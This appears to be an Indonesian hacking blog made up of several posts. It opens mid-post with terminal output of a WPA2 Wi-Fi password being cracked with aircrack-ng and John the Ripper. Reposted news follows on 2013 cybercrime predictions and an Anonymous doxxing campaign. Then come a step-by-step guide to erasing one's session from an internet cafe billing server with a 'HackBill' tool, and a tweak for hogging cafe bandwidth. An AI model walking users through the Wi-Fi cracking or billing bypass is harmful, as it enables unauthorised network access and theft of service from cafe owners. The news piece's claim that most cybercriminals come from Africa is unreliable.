Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B

EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@zahrandiaz:~#

Nah, passwordnya ketemu: W!R3L3$$PWD
7. Kalo anda tidak mau pake wordlist, ya biasanya menunggu agak lama, apalagi kalo komputernya lambat bisa lebih lama + belum tentu berhasil.

Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:

root@zahrandiaz:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904
[00:00:22] 11484 keys tested (534.50 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B

EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@zahrandiaz:~#

Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD 

PENTING!!!
Lamanya untuk mendapatkan password itu tergantung password yang ada.

Apabila passwordnya huruf atau angka saja bisa memungkinkan lebih cepat,apabila karakter seperti *,dll itu akan lebih lama apalagi bila dicampur oleh angka dan huruf.
(referensi:binushacker.net)

Friday, December 28, 2012

10 Ancaman Kejahatan Cyber Tahun 2013


Kejahatan cyber terus meningkat.

Tren kejahatan cyber di dunia akan meningkat tahun depan. Indonesia pun diprediksi akan turut menjadi korban kejahatan cyber itu.
Ini karena tren online shopping di Indonesia terus meningkat. Studi Harvard School of Business yang dibuat akhir Agustus 2012 menunjukkan, nilai pasar e-commerce Indonesia mencapai US$0,9,” kata Aulia Huriadi, Manajer Pengembangan Bisnis dari perusahaan penyedia jasa keamanan internet Trend Micro di Jakarta pada Jumat 28 Desember 2012.


Tahun ini saja, kata Aulia, kejahatan cyber meningkat dibanding tahun 2011. Ini membuat negara-negara di dunia, khususnya negara berkembang, lebih terlibat aktif dan meningkatkan kontribusinya dalam memerangi kejahatan cyber di dunia maya.

Bentuk kejahatan di internet itu selama ini misalnya pencurian data, pornografi anak, dan perdagangan narkoba. Berikut sepuluh ancaman kejahatan cyber yang diprediksi akan terjadi pada tahun 2013:

1. Volume malware di aplikasi Android akan meningkat menjadi 1 juta. Ini karena penggunaan sistem operasi Android banyak digunakan oleh personal mau perusahaan.

2. Tingkat keamanan Windows 8 membaik hanya bagi para pengguna yang menggunakan software asli.

3. Kejahatan cyber akan lebih mengarah pada penggunaan cloud service seperti pada penggunaan blog, Twitter, Facebook, Google docs, Dropbox, Pastebin, dan Amazon EC 2.

4. Teknologi akan semakin merasuki individu sehingga ancaman kejahatan cyber muncul di tempat yang tidak terduga seperti di televisi digital, game box digital, dan lain-lain.

5. Akan terjadi serangan online di setiap negara. Saat ini pun sudah mulai banyak bentuk serangan virus ke suatu negara.

6. Kejahatan cyber akan tetap terjadi dengan atau tanpa penggunaan cloud computing. Banyak faktor yang membuat kejahatan cyber terus meningkat, salah satunya masyarakat belum teredukasi menggunakan software antivirus.

7. Hukum yang mengatur kejahatan cyber belum jelas. Diperkirakan baru dua atau tiga tahun lagi hukum ini akan mulai efektif.

8. Malware akan semakin pintar untuk masuk ke dalam device personal maupun ke PC. Ini karena malware sudah dimasukkan ke dalam antivirus palsu, key logger, dan saat transfer data.

9. Saat ini orang menggunakan perangkat personalnya  dengan bermacam-macam platform. Penggunaan multiplatform ini membuat mereka makin rentan terkena kejahatan cyber.

10. Afrika akan menjadi tempat yang aman bagi para pelaku kejahatan cyber. Ini karena tingkat koneksi internet di Afrika paling besar di dunia. Rata-rata para pejahat cyber berasal dari Afrika, dan sudah banyak bank-bank yang mem-block IP address dari Afrika.

Ada beberapa tips untuk menghindari kejahatan cyber. Untuk kalangan personal, dianjurkan untuk selalu meng-upgrade sistem operasi pada perangkat smartphone dan software program, gunakan software antivirus di mobile device dan PC, pastikan keamanan password dengan menggantinya secara berkala, dan bedakan setiap password untuk setiap platform yang digunakan.(viva.co.id)

Monday, November 19, 2012

Hacker Anonymous Lancarkan Serangan ke Pendukung Israel

Kelompok Hacker Anonymous
Kelompok aktivis peretas (hacktivist) Anonymous mengklaim telah membocorkan informasi pribadi sebanyak 3000 individu yang telah melakukan donasi untuk organisasi pro Israel, Unity Coalition for Israel. Data yang dibocorkan itu termasuk alamat rumah, nomor telepon, dan alamat email.


Mengutip laman The Next Web, aksi Anonymous ini dilakukan setelah mereka menyerang 650 situs Israel pada 17 November lalu. Selain menghapus database, Anonymous juga membocorkan username dan password.

Anonymous kemudian membocorkan informasi itu ke situs Pastebin. Ini menyebabkan akses ke Pastebin menjadi penuh dan sulit dibuka.

Tapi The Next Web menyebut sejumlah nama, salah satunya adalah Senator AS dari Hawaii, Daniel Inouye, yang melawan Nazi saat Perang Dunia II dan dikenal sebagai politisi yang sangat dekat dengan Israel. Nama senator lain pun masuk daftar, di antaranya Spencer Abraham, Christopher Bond, John Breaux, Alfonse D'Amato, dan Rod Grams. Terdapat juga sejumlah nama penting di berbagai pemerintahan dan LSM ternama.

Serangan cyber kepada Israel ini dilakukan sebagai bentuk protes Anonymous terhadap serangan Israel.

Atas aksi yang diberi nama "Operation Israel", label teroris pun ikut ditempel kepada Anonymous. Namun Anonymous membantah tuduhan ini.

"Biar kami perjelas sekali lagi: Anonymous tidak memberikan dukungan terhadap aksi kekerasan. Anonymous merupakan kumpulan individu dari berbagai penjuru dunia yang memiliki tujuan untuk kepentingan hak asasi manusia, keadilan, dan persamaan universal untuk warga negara di semua negara," tulis Anonymous di situs Anonpaste.me.(viva.co.id)

Wednesday, April 6, 2011

Hack Waktu Billing Exploler


Sudah banyak cara untuk mengelabui billing explorer atau ngenet gratis dengan kecepatan yang cukup cepat. Kali ini caranya cukup mudah tinggal download aja softwarenya. Software ini sizenya dijamin tidak bakalan menghabiskan disk space cuma 70 KB. Berikut cara penggunaannya
Bahan-Bahan :
1. Secangkir Kopi Hangat buat nemenin ngenet gratis semalaman penuh di warnet
2. CMD, kalo CMD di warnet di block coba pake PortableApps >> CMD Portable
3. HackBill.zip
 

Caranya :
1. Buka CMD, kemudian ketik net view, kemudian pasti keluar komputer-komputer yang terhubung dengan jaringan LAN di warnet tersebut
2. Cari yang kira - kira komputer tersebut adalah komputer server(biasanya pakai nama WARNETBILLING, pokoknya ada tulisan admin , administrator , billing, dll lah)
3. Kemudian ketik ping nama_komputer_server(ex. ping DENETBILLING)
4. Catat IP Address adminnya itu...
5. Jalankan program billhack.zip
6. Pilih single client atau all client, single client untuk menggratiskan komputer tertentu saja, all client untuk mengratiskan semua komputer, saya saranin pake yang single client aja, biar dosanya tidak besar...
7. Ketik IP Address admin tadi, pake port 1500, trus tekan hack now
8. Taraaaaaaaaaaaa, di biling server nickname kita sudah tidak ada.
9. Tanyain ke OP kalo mau bayar atau mau buktiin kalo emang hacking-nya sukses, kalo gak mau bayar ya sudah lewati saja

Note : Pada billing di komputer kita billing tetap berjalan, tetapi di server sudah tidak ada,(tidak ada bukan NOL(0)). Hal ini juga bisa membantu kita jika kita ingin jujur, kita tinggal bayar sesuai yang tertera pada billing kita.
Buat Para Operator warnet,Siap-siap Untuk Hati-hati.Ok


Perhatian : Saya tidak bertanggung jawab atas segala hal perbuatan negatif atas software ini ( WAJIB DI CATAT )

Thursday, February 17, 2011

Tutorial Cara Mencuri PASSWORD dengan Firefox Add-Ons

Kamu kesal menunggu loading di Warnet, itu karena Warnet telah membatasi bitrate dan bandwithnya.
Nah.. Banyak jalan menuju Neraka.. eh Roma deng…, begini caranya :
  • Buka Browser Mozilla Firefox…
  • Pada Address Bar Ketik : ABOUT:CONFIG
  • Cari string di bawah ini : ( pastikan semua string di bawah “TRUE”)
contoh menggantinnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih “Toggle”
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MA
XREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False
  • buat string baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan NEW>>INTEGER
  • Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
  • Kemudian REFRESH atau tekan F5
  • Pada Address Bar ketik : ABOUT:BLANK
. Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
  • Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE beri tanda Check Box untuk mengaktifkan
  • Kemudian tekan OK lalu REFRESH ( F5 )
  • Masuk ke Link Ini :
  • Download software SwitchProxy Tool Versi 1.3.4
  • Setelah selesai jangan tekan tombol UPDATE
  • Klik tanda X (tutup)Yang ada di pojok kanan atas dari POP UP Window yang muncul
  • Tutup semua browser Mozilla FireFox,
  • Kemudian buka lagi untuk mengaktifkan Software SwitchProxy Tool Versi 1.3.4 yang sudah di Install tadi
  • Kalau Instalasi sukses, akan muncul Toolbar tambahan di bawah Toolbar Navigasi & Address Bar.
  • Sekarang browser Mozilla siap untuk digunakan…….
:::::::CATATAN:::::::
  • Software SwitchProxy Tool Versi 1.3.4 ini selain untuk mengganti proxy secara otomatis di browser Mozilla FireFox, Engine-nya juga berpengaruh terhadap kecepatan koneksi internet
  • Cara ini sangat efektif bila digunakan di Warnet yang padat pengunjung untuk menyedot bandwidth ke Komputer yang sedang anda pakai
  • Perubahan yang signifikan terjadi pada koneksi internet dengan BROADBAND / VSAT